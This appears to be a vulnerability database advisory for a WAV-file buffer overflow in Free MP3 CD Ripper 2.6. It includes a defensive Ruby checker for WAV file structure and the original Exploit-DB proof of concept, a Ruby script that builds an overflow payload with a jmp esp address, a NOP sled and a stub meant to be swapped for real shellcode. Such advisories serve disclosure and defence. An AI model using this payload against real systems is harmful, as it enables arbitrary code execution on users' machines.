Vendor: Free MP3 CD Ripper
By: Richard Leahy
CVSS: 9.3 (HIGH)
Type: Buffer Overflow
CWE: 119
Product Name: Free MP3 CD Ripper
Affected Version From: 2.6
Affected Version To: 2.6
Patch Exists: YES
Related CWE: N/A
CPE: a:free_mp3_cd_ripper:free_mp3_cd_ripper
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP2
2010

Free MP3 CD Ripper 2.6 (wav) 0-day

A buffer overflow vulnerability exists in Free MP3 CD Ripper 2.6 when a specially crafted WAV file is opened. The vulnerability is due to insufficient boundary checks when processing WAV files. By sending a specially crafted WAV file, an attacker can cause a buffer overflow and execute arbitrary code in the context of the application.

Mitigation:

Upgrade to the latest version of Free MP3 CD Ripper.
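
The proof of concept further down this page is plain filler text saved with a .wav extension, so a structural check of the RIFF/WAVE container can flag such a file before it is handed to the converter. The Ruby check below is an added example, not code from the original advisory or the vendor; the name `wav_findings` and both sample inputs are constructed for illustration.

```ruby
# Added example: structural pre-screen for untrusted .wav files.
# wav_findings and both samples are constructed for illustration.
# Returns a list of findings; an empty list means the container is well formed.
def wav_findings(data)
  data = data.b # work on raw bytes
  return ["too short for a RIFF/WAVE header"] if data.bytesize < 12
  return ["missing RIFF/WAVE magic"] unless data[0, 4] == "RIFF" && data[8, 4] == "WAVE"

  findings = []
  riff_size = data[4, 4].unpack1("V") # little-endian u32
  findings << "RIFF size exceeds file length" if riff_size + 8 > data.bytesize

  offset = 12
  seen = []
  while offset + 8 <= data.bytesize
    id = data[offset, 4]
    size = data[offset + 4, 4].unpack1("V")
    seen << id
    if offset + 8 + size > data.bytesize
      findings << "chunk #{id.inspect} at offset #{offset} declares #{size} bytes, more than the file holds"
      break
    end
    findings << "fmt chunk shorter than 16 bytes" if id == "fmt " && size < 16
    offset += 8 + size + (size & 1) # chunks are padded to an even length
  end
  findings << "no fmt chunk" unless seen.include?("fmt ")
  findings << "no data chunk" unless seen.include?("data")
  findings
end

# Constructed sample: minimal 8-bit mono PCM file with four samples.
def sample_valid_wav
  fmt = ["fmt ", 16, 1, 1, 8000, 8000, 1, 8].pack("a4VvvVVvv")
  data = ["data", 4].pack("a4V") + "\x80".b * 4
  body = "WAVE".b + fmt + data
  ["RIFF", body.bytesize].pack("a4V") + body
end

# Constructed sample: filler text saved under a .wav name, no RIFF header.
def sample_text_as_wav
  "A" * 64 + "\n"
end

if __FILE__ == $PROGRAM_NAME
  { "valid.wav" => sample_valid_wav, "text.wav" => sample_text_as_wav }.each do |name, bytes|
    f = wav_findings(bytes)
    puts "#{name}: #{f.empty? ? 'ok' : f.join('; ')}"
  end
end
```

An empty result only means the container is well formed; it does not replace upgrading the application.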

Exploit-DB raw data:

# Exploit Title: Free MP3 CD Ripper 2.6 (wav) 0-day
# Date: 30/03/2010
# Author: Richard Leahy
# Software Link: http://www.soft32.com/Download/Free/Free_MP3_CD_Ripper/4-250188-1.html
# Version: 2.6
# Tested on: Windows XP SP2

# To exploit this, open up the application and select File -> WAV converter -> WAV to MP3.

# Use your favourite programming language and print out the contents into a text file. Save the text file as a .wav,
# then open up the WAV file and boom.

# Feel free to email me: leahy_rich@hotmail.com

# Code

#!/usr/bin/env ruby
nop = "\x90" # nop
shellcode = "\xCC" # just an interrupt; can be replaced by proper shellcode
jmp_esp = "\x32\xfa\xca\x76" # find a jmp esp (I will use imagehlp); little endian, so reverse it
boom = "A" * 4112 + jmp_esp + nop * 50 + shellcode

puts boom